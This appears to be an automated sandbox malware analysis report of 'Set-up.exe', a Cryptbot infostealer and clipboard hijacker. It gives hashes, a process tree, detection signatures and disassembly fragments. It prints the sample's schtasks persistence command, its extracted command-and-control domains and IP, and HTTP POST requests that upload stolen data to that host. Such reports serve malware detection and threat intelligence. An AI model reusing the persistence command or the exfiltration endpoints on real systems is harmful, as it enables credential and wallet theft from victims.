Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1523427
MD5:	bb85c40120dac356bfc311f4774d3439
SHA1:	bdcc094a88aa8971753da0c86e05c68578e5ce84
SHA256:	cff579e5facdd493e0b023979049f4504ffc611c352a7d97928943e61c66dd0d
Tags:	ClipboardHijackerexeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: BB85C40120DAC356BFC311F4774D3439)

service123.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: 3FFF09206AC36D06CF8352458CA5573E)

schtasks.exe (PID: 8168 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 7280 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 3FFF09206AC36D06CF8352458CA5573E)

service123.exe (PID: 5268 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: 3FFF09206AC36D06CF8352458CA5573E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["elevenvx11pn.top", "~elevenvx11pn.top", "analforeverlovyu.top", "zx11pn.top", "|Xl@elevenvx11pn.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1976708415.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7652	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: Set-up.exe PID: 7652	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 7652	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 8148	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.service123.exe.6c940000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Set-up.exe", ParentImage: C:\Users\user\Desktop\Set-up.exe, ParentProcessId: 7652, ParentProcessName: Set-up.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8168, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T15:48:14.004848+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49706	185.244.181.140	80	TCP
2024-10-01T15:48:17.498990+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49708	185.244.181.140	80	TCP
2024-10-01T15:48:22.466721+0200	2054350	1	A Network Trojan was detected	192.168.2.9	49709	185.244.181.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Set-up.exe.7652.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["elevenvx11pn.top", "~elevenvx11pn.top", "analforeverlovyu.top", "zx11pn.top", "|Xl@elevenvx11pn.top"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_006615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		5_2_6C9414B0

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	5_2_006681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BAC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BAD20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C9E2EF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C95AF80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CA1F960h	5_2_6C95E8C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C96E490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C9604F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	5_2_6C9E04E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C960610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C96A790
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C96A720
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C960010
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6CA1D014h]	5_2_6CA14110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	5_2_6C96C2C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C964203
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C9E8250
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C96A3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	5_2_6C96A330
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BBDF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	5_2_6C999F90
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BBF50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C97B987
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C97B98B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C999910
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C9F9900
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BBAC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	5_2_6C9B7AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	5_2_6C96D424
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6CA1DFF4h	5_2_6C9B3440
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	5_2_6C96D5A4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	5_2_6C9B35F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	5_2_6C96D724
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C96D050
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	5_2_6C9D7100
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	5_2_6C9BB280
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	5_2_6C96D2B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	5_2_6C9B93B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49706 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49709 -> 185.244.181.140:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49708 -> 185.244.181.140:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: elevenvx11pn.top
Source: Malware configuration extractor	URLs: ~elevenvx11pn.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: zx11pn.top
Source: Malware configuration extractor	URLs: \|Xl@elevenvx11pn.top

Source: Joe Sandbox View

IP Address: 185.244.181.140 185.244.181.140

Source: Joe Sandbox View

ASN Name: BELCLOUDBG BELCLOUDBG

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary71095901User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: elevenvx11pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary18234966User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 90016Host: elevenvx11pn.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary50062139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 34443Host: elevenvx11pn.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: elevenvx11pn.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary71095901User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: elevenvx11pn.top

Source: Set-up.exe, 00000000.00000003.1484449204.00000000007DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://elevenvx11pn.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NrIpUDVFuuHZveDEtrIh.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe	String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1525890260.0000000003340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C959B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

5_2_6C959B99

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6C959B99 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,GetClipboardSequenceNumber,

5_2_6C959B99

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\Set-up.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_006651B0	5_2_006651B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00663E20	5_2_00663E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C94CD00	5_2_6C94CD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA04E80	5_2_6CA04E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C94EE50	5_2_6C94EE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C950FC0	5_2_6C950FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C990870	5_2_6C990870
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C982A7E	5_2_6C982A7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C984490	5_2_6C984490
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9544F0	5_2_6C9544F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C980580	5_2_6C980580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C978570	5_2_6C978570
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C972110	5_2_6C972110
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C98FE10	5_2_6C98FE10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C981E40	5_2_6C981E40
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C955880	5_2_6C955880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C98D99E	5_2_6C98D99E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C99DA20	5_2_6C99DA20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C96F510	5_2_6C96F510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9796A0	5_2_6C9796A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9877D0	5_2_6C9877D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9570C0	5_2_6C9570C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C943000	5_2_6C943000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9811BE	5_2_6C9811BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9912C0	5_2_6C9912C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C98F3C0	5_2_6C98F3C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA13490 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA0AB60 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA15980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA15A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA138D0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA13310 appears 42 times

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\YEWtNFaySe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\CuDNObfgqmczoBnKhtUp

Source: C:\Users\user\Desktop\Set-up.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1526107515.000000000332D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: nripudvfuuhzvedetrih.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
